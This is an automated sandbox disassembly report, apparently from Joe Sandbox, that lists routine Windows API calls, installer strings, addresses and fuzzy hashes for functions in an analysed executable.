                                                                          • Instruction ID: 14e0b5c6cd5b97c86ff82054d5328c9cf2b7980ad66a2a36783bbd85928cae88
                                                                          • Opcode Fuzzy Hash: 9475b91f6b12abc75ac03e97528c4589aec67ab33c443f8169a5e3803f66a059
                                                                          • Instruction Fuzzy Hash: 6E3143706083809FD330EB65C945B9B77E89B8A304F40483FB6C8E72D1DB7999058767
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • SendMessageA.USER32(00000000,000001A1,?,00000000), ref: 0044E1A1
                                                                            • Part of subcall function 0044C7E4: SendMessageA.USER32(00000000,000001A0,?,00000000), ref: 0044C816
                                                                          • InvalidateRect.USER32(00000000,00000000,00000001,00000000,000001A1,?,00000000), ref: 0044E225
                                                                            • Part of subcall function 0042BB24: SendMessageA.USER32(00000000,0000018E,00000000,00000000), ref: 0042BB38
                                                                          • IsRectEmpty.USER32(?), ref: 0044E1E7
                                                                          • ScrollWindowEx.USER32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000006), ref: 0044E20A
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Rect$EmptyInvalidateScrollWindow
                                                                          • String ID:
                                                                          • API String ID: 855768636-0
                                                                          • Opcode ID: 2f4f09d471764e0b40a61100a36ec5f960fc55f7f790cb04e4501a849a6d4287
                                                                          • Instruction ID: 5406ccee5fb56c270110fdf5510288933eb71161ddc8a876bede12871bf79798
                                                                          • Opcode Fuzzy Hash: 2f4f09d471764e0b40a61100a36ec5f960fc55f7f790cb04e4501a849a6d4287
                                                                          • Instruction Fuzzy Hash: 6E114D71B4031027E210BA7E9C86B5B66CDAB88749F04493FB605EB383DEB9DC058299
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • OffsetRect.USER32(?,?,00000000), ref: 0048F8C0
                                                                          • OffsetRect.USER32(?,00000000,?), ref: 0048F8DB
                                                                          • OffsetRect.USER32(?,?,00000000), ref: 0048F8F5
                                                                          • OffsetRect.USER32(?,00000000,?), ref: 0048F910
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: OffsetRect
                                                                          • String ID:
                                                                          • API String ID: 177026234-0
                                                                          • Opcode ID: b92cc9e0c51abad00843a30158c78bfcdf3235bd319301de45a4e2a650a825ad
                                                                          • Instruction ID: ce36c56c1c582fdda7e72a0fface693b427ee6f0177311c7c28b849f91f6b588
                                                                          • Opcode Fuzzy Hash: b92cc9e0c51abad00843a30158c78bfcdf3235bd319301de45a4e2a650a825ad
                                                                          • Instruction Fuzzy Hash: 0F217CB6700201ABD300EE69CC85E5BB7DEEBD4344F14CA3AF954C7249D738E94887A6
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetCursorPos.USER32 ref: 004171D0
                                                                          • SetCursor.USER32(00000000), ref: 00417213
                                                                          • GetLastActivePopup.USER32(?), ref: 0041723D
                                                                          • GetForegroundWindow.USER32(?), ref: 00417244
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Cursor$ActiveForegroundLastPopupWindow
                                                                          • String ID:
                                                                          • API String ID: 1959210111-0
                                                                          • Opcode ID: c1cfbe4ca0de68e17c4a100ee12b51fff2b36c6f0ea2abcdeec6e8c4ace2589f
                                                                          • Instruction ID: 088d0700f5649383027441de99f76d51f9d962fb002c63a2b2ca12876e25bed5
                                                                          • Opcode Fuzzy Hash: c1cfbe4ca0de68e17c4a100ee12b51fff2b36c6f0ea2abcdeec6e8c4ace2589f
                                                                          • Instruction Fuzzy Hash: 192183713086018ACB20ABA9D889AD733F1AF85714F0545ABF8589B792D73DDC82CB59
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • MulDiv.KERNEL32(8B500000,00000008,?), ref: 0048F529
                                                                          • MulDiv.KERNEL32(50142444,00000008,?), ref: 0048F53D
                                                                          • MulDiv.KERNEL32(F76037E8,00000008,?), ref: 0048F551
                                                                          • MulDiv.KERNEL32(8BF88BFF,00000008,?), ref: 0048F56F
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6335ae3c13ddf35d91c6dca3ece5bfa36ba83b479f3d3f49975b0228b2d303f4
                                                                          • Instruction ID: 6f2f5d3731a38f560a61ba406435f1238513cd740096e42b36e3bab7bd81765c
                                                                          • Opcode Fuzzy Hash: 6335ae3c13ddf35d91c6dca3ece5bfa36ba83b479f3d3f49975b0228b2d303f4
                                                                          • Instruction Fuzzy Hash: AA112172604204BBCB40EEADC8C4D9B77ECEF4D360B24416AF918DB246D634ED408BA8
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetClassInfoA.USER32(00400000,0041F3E0,?), ref: 0041F411
                                                                          • UnregisterClassA.USER32(0041F3E0,00400000), ref: 0041F43A
                                                                          • RegisterClassA.USER32(00493598), ref: 0041F444
                                                                          • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0041F47F
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Class$InfoLongRegisterUnregisterWindow
                                                                          • String ID:
                                                                          • API String ID: 4025006896-0
                                                                          • Opcode ID: 369b4581b8718a6b7f5c456dac74c697fddaa2f7eb52355fd25e4240f497afd1
                                                                          • Instruction ID: ba8a097de1154e85499311c45b2324022c4db67c4a949dbf0f11183773784737
                                                                          • Opcode Fuzzy Hash: 369b4581b8718a6b7f5c456dac74c697fddaa2f7eb52355fd25e4240f497afd1
                                                                          • Instruction Fuzzy Hash: 720152712401047BCB20EF68ED81E9B37ACA76D314B11413BBA05E72E1D635DD165BAD
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • FindResourceA.KERNEL32(00400000,?,00000000), ref: 0040D187
                                                                          • LoadResource.KERNEL32(00400000,72756F73,0040A928,00400000,00000001,00000000,?,0040D0E4,00000000,?,00000000,?,?,0047764C,0000000A,REGDLL_EXE), ref: 0040D1A1
                                                                          • SizeofResource.KERNEL32(00400000,72756F73,00400000,72756F73,0040A928,00400000,00000001,00000000,?,0040D0E4,00000000,?,00000000,?,?,0047764C), ref: 0040D1BB
                                                                          • LockResource.KERNEL32(74536563,00000000,00400000,72756F73,00400000,72756F73,0040A928,00400000,00000001,00000000,?,0040D0E4,00000000,?,00000000,?), ref: 0040D1C5
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Resource$FindLoadLockSizeof
                                                                          • String ID:
                                                                          • API String ID: 3473537107-0
                                                                          • Opcode ID: b3c15c4636e7b2139434bed422b55b0694fd43cf85b07dfc26612a38abd02691
                                                                          • Instruction ID: a2e4909c1946fcd89949086e6ecb513f2c22862e5b7fa6f76d970aa484769738
                                                                          • Opcode Fuzzy Hash: b3c15c4636e7b2139434bed422b55b0694fd43cf85b07dfc26612a38abd02691
                                                                          • Instruction Fuzzy Hash: BEF0FF726056046F9754EE9DA881D5B76ECDE48264320416AF908EB246DE38DD118B78
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                            • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0047DDF7,?,00000001,?,?,0047DDF7,?,00000001,00000000), ref: 0042DC70
                                                                          • RegDeleteValueA.ADVAPI32(?,00000000,00000082,00000002,00000000,?,?,00000000,00459AD2,?,?,?,?,?,00000000,00459AF9), ref: 00454540
                                                                          • RegCloseKey.ADVAPI32(00000000,?,00000000,00000082,00000002,00000000,?,?,00000000,00459AD2,?,?,?,?,?,00000000), ref: 00454549
                                                                          • RemoveFontResourceA.GDI32(00000000), ref: 00454556
                                                                          • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 0045456A
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CloseDeleteFontMessageNotifyOpenRemoveResourceSendValue
                                                                          • String ID:
                                                                          • API String ID: 4283692357-0
                                                                          • Opcode ID: 96fa512f3f662ed87c37535a3766b553a9c327ccaabb4965c9ab73448b41aaf6
                                                                          • Instruction ID: 1eb0840f44da6d39683793e989569f75594476954d085f3704b84519527e0fd3
                                                                          • Opcode Fuzzy Hash: 96fa512f3f662ed87c37535a3766b553a9c327ccaabb4965c9ab73448b41aaf6
                                                                          • Instruction Fuzzy Hash: B9F054B574535037EA10B6B69C47F1B228C8F94749F10483BB600EF2C3D97CD904962D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetLastError.KERNEL32(00000000,00000000), ref: 0046B729
                                                                          Strings
                                                                          • Failed to set NTFS compression state (%d)., xrefs: 0046B73A
                                                                          • Unsetting NTFS compression on directory: %s, xrefs: 0046B70F
                                                                          • Setting NTFS compression on directory: %s, xrefs: 0046B6F7
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast
                                                                          • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on directory: %s$Unsetting NTFS compression on directory: %s
                                                                          • API String ID: 1452528299-1392080489
                                                                          • Opcode ID: d53215409e502109a5a1d7da470d817492eeecdd52408c6bdcbefe281b75e759
                                                                          • Instruction ID: 8a2dc4ed195109a8471c1236a5c58557194bf09444f2f11eb0036fe1721b7234
                                                                          • Opcode Fuzzy Hash: d53215409e502109a5a1d7da470d817492eeecdd52408c6bdcbefe281b75e759
                                                                          • Instruction Fuzzy Hash: 6E014431D0824866CF04D7ED90512EDBBF4DF49305F54C5AFA454DB242EBB9094987DB
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetLastError.KERNEL32(?,00000000), ref: 0046C019
                                                                          Strings
                                                                          • Failed to set NTFS compression state (%d)., xrefs: 0046C02A
                                                                          • Unsetting NTFS compression on file: %s, xrefs: 0046BFFF
                                                                          • Setting NTFS compression on file: %s, xrefs: 0046BFE7
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast
                                                                          • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on file: %s$Unsetting NTFS compression on file: %s
                                                                          • API String ID: 1452528299-3038984924
                                                                          • Opcode ID: 64252f671433613891e1a7440361f40b2ffce42b5703e84520e84a0d5a72c339
                                                                          • Instruction ID: f21eca6685929eef9c1991e0f0882ebce6d76680defdff1bfc8b5815b9b403a8
                                                                          • Opcode Fuzzy Hash: 64252f671433613891e1a7440361f40b2ffce42b5703e84520e84a0d5a72c339
                                                                          • Instruction Fuzzy Hash: FD014430E08248AACB14D7ED90912BDBBF49F09304F54C1AFA494DB242EAB905088B9B
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$CountSleepTick
                                                                          • String ID:
                                                                          • API String ID: 2227064392-0
                                                                          • Opcode ID: 7f9be6c62347cb85835d29a1a4366730904a4622375b7e81926710e7e3913ef5
                                                                          • Instruction ID: 600cfe0a74c4f2c1bd3ebedcfd2d7a6b72f2f4999c435aba37b1015e9725878a
                                                                          • Opcode Fuzzy Hash: 7f9be6c62347cb85835d29a1a4366730904a4622375b7e81926710e7e3913ef5
                                                                          • Instruction Fuzzy Hash: B5E0E53170D501498A2031AE988A6AB4689CA89324B1985FFF48CE6242C4184C05C76F
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32(00000008,?,0047B069,?,?,00000001,00000000,00000002,00000000,0047B8F6,?,?,?,?,?,00492A60), ref: 00473429
                                                                          • OpenProcessToken.ADVAPI32(00000000,00000008,?,0047B069,?,?,00000001,00000000,00000002,00000000,0047B8F6), ref: 0047342F
                                                                          • GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008,?,0047B069,?,?,00000001,00000000,00000002,00000000,0047B8F6), ref: 00473451
                                                                          • CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008,?,0047B069,?,?,00000001,00000000,00000002,00000000), ref: 00473462
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                          • String ID:
                                                                          • API String ID: 215268677-0
                                                                          • Opcode ID: 5e6959b0aa08eab338446373c25635829722180206a086ec912edd4ecd6bffc1
                                                                          • Instruction ID: b2e67a826371a673a356ac5d6eaa9b5bb997f149e1c9fc538a60d49279a5b6ce
                                                                          • Opcode Fuzzy Hash: 5e6959b0aa08eab338446373c25635829722180206a086ec912edd4ecd6bffc1
                                                                          • Instruction Fuzzy Hash: 99F03061644301ABD600EAB5CC82E9B77DCEB44754F04883A7E98D72C1D679DD08AB66
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetLastActivePopup.USER32(?), ref: 004241BC
                                                                          • IsWindowVisible.USER32(?), ref: 004241CD
                                                                          • IsWindowEnabled.USER32(?), ref: 004241D7
                                                                          • SetForegroundWindow.USER32(?), ref: 004241E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Window$ActiveEnabledForegroundLastPopupVisible
                                                                          • String ID:
                                                                          • API String ID: 2280970139-0
                                                                          • Opcode ID: 45cc8346385df99cd35dc406275c17b3484034b80334a27cef1f15798a1a4062
                                                                          • Instruction ID: 7a261241521d5f36110480f60a41559dbc21bd8b6604a945fb8666e4bf107b55
                                                                          • Opcode Fuzzy Hash: 45cc8346385df99cd35dc406275c17b3484034b80334a27cef1f15798a1a4062
                                                                          • Instruction Fuzzy Hash: 0DE08699B06531139E31FA251885ABB25ACCD54B883C60127BC04F7243DF1CCFA0C1AC
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetSystemMenu.USER32(00000000,00000000,0000F060,00000001), ref: 00466DD9
                                                                          • EnableMenuItem.USER32(00000000,00000000,00000000), ref: 00466DDF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$EnableItemSystem
                                                                          • String ID: CurPageChanged
                                                                          • API String ID: 3692539535-2490978513
                                                                          • Opcode ID: 02cdd856f79da87946ce3be0036284d170d79325171fd6f69fc8e8dc4402c0b0
                                                                          • Instruction ID: ce10d549b0c21605a6af546479ee9e12edac585882682887e1d5a1eed24c9042
                                                                          • Opcode Fuzzy Hash: 02cdd856f79da87946ce3be0036284d170d79325171fd6f69fc8e8dc4402c0b0
                                                                          • Instruction Fuzzy Hash: E5A10734700104DFD711DB69D985EAD77F5EF89304F2640BAE8049B362EB39AE41DB49
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetCursorPos.USER32(?), ref: 004248D5
                                                                          • WaitMessage.USER32(00000000,004249C9,?,?,?,?), ref: 004249A9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CursorMessageWait
                                                                          • String ID: )I
                                                                          • API String ID: 4021538199-2943873603
                                                                          • Opcode ID: bb51d86f2fc56d9b79fd6e24fc7d3904fa82574d4d9fbf57c4ed1671c248813e
                                                                          • Instruction ID: 3684f1357379c85a98af1ae3a8e7e482b9cd7f2697edbb5586c2bc0712e370a9
                                                                          • Opcode Fuzzy Hash: bb51d86f2fc56d9b79fd6e24fc7d3904fa82574d4d9fbf57c4ed1671c248813e
                                                                          • Instruction Fuzzy Hash: 5D31D4B07002249BCB21EF39D48179FB7B5EFC8304F96456AEC049B385DB789D80CA99
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • SendMessageA.USER32(00000000,0000044B,00000000,?), ref: 0044F895
                                                                          • ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 0044F8C6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ExecuteMessageSendShell
                                                                          • String ID: open
                                                                          • API String ID: 812272486-2758837156
                                                                          • Opcode ID: 39befbd8bfe4d04ca9f0ad22fe8eee91a23e6983e02579a401e517ae9ce6b0ad
                                                                          • Instruction ID: 7c1a3c7c8ebbf10466e07294f195938a80af8ea232d4303b03533db3f0a8dc42
                                                                          • Opcode Fuzzy Hash: 39befbd8bfe4d04ca9f0ad22fe8eee91a23e6983e02579a401e517ae9ce6b0ad
                                                                          • Instruction Fuzzy Hash: ED213270E00644AFEB00EF69C881A9EB7F8EB44704F60857BF501FB391D7789A498A58
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          • Failed to proceed to next wizard page; showing wizard., xrefs: 004687E1
                                                                          • Failed to proceed to next wizard page; aborting., xrefs: 004687CD
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Failed to proceed to next wizard page; aborting.$Failed to proceed to next wizard page; showing wizard.
                                                                          • API String ID: 0-1974262853
                                                                          • Opcode ID: cfba3478a7359d3cbe5014acf16baf13cc054a1082433b199a19fc1bb0af4262
                                                                          • Instruction ID: f19096d41c4aac5864f1bb8ccf8968ed334c7e4c4402baa3f8ad6812cbe3c8f9
                                                                          • Opcode Fuzzy Hash: cfba3478a7359d3cbe5014acf16baf13cc054a1082433b199a19fc1bb0af4262
                                                                          • Instruction Fuzzy Hash: 2621B074A04204AFD701EBA9D985E99B7F4EF45315F2541BBF404AB392EB38AE40CB1D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • ShellExecuteEx.SHELL32(0000003C), ref: 00453A94
                                                                          • GetLastError.KERNEL32(0000003C,00000000,00453ADD,?,?,00000001,00000001), ref: 00453AA5
                                                                            • Part of subcall function 004536EC: WaitForInputIdle.USER32(00000001,00000032), ref: 00453718
                                                                            • Part of subcall function 004536EC: MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 0045373A
                                                                            • Part of subcall function 004536EC: GetExitCodeProcess.KERNEL32(00000001,00000001), ref: 00453749
                                                                            • Part of subcall function 004536EC: CloseHandle.KERNEL32(00000001,00453776,0045376F,?,00000031,00000080,00000000,?,?,00453AC7,00000080,0000003C,00000000,00453ADD), ref: 00453769
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Wait$CloseCodeErrorExecuteExitHandleIdleInputLastMultipleObjectsProcessShell
                                                                          • String ID: <
                                                                          • API String ID: 35504260-4251816714
                                                                          • Opcode ID: 5d562b07ccb6d432d664981823a10e5781889d8990a1d6319f014274b2d54e6a
                                                                          • Instruction ID: 731c30c279f4aac689e5cd79ec505c098efd6bab46e48a29a8149d1d071dcc10
                                                                          • Opcode Fuzzy Hash: 5d562b07ccb6d432d664981823a10e5781889d8990a1d6319f014274b2d54e6a
                                                                          • Instruction Fuzzy Hash: 862186B0600249EFDB10DF65D88269E7BE8EF04346F50443AF840E7381D7789E49CB98
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • RtlEnterCriticalSection.KERNEL32(00494420,00000000,)), ref: 004025C7
                                                                          • RtlLeaveCriticalSection.KERNEL32(00494420,0040263D), ref: 00402630
                                                                            • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(00494420,00000000,00401A82,?,?,0040222E,021771FC,00001B1C,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                            • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(00494420,00494420,00000000,00401A82,?,?,0040222E,021771FC,00001B1C,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
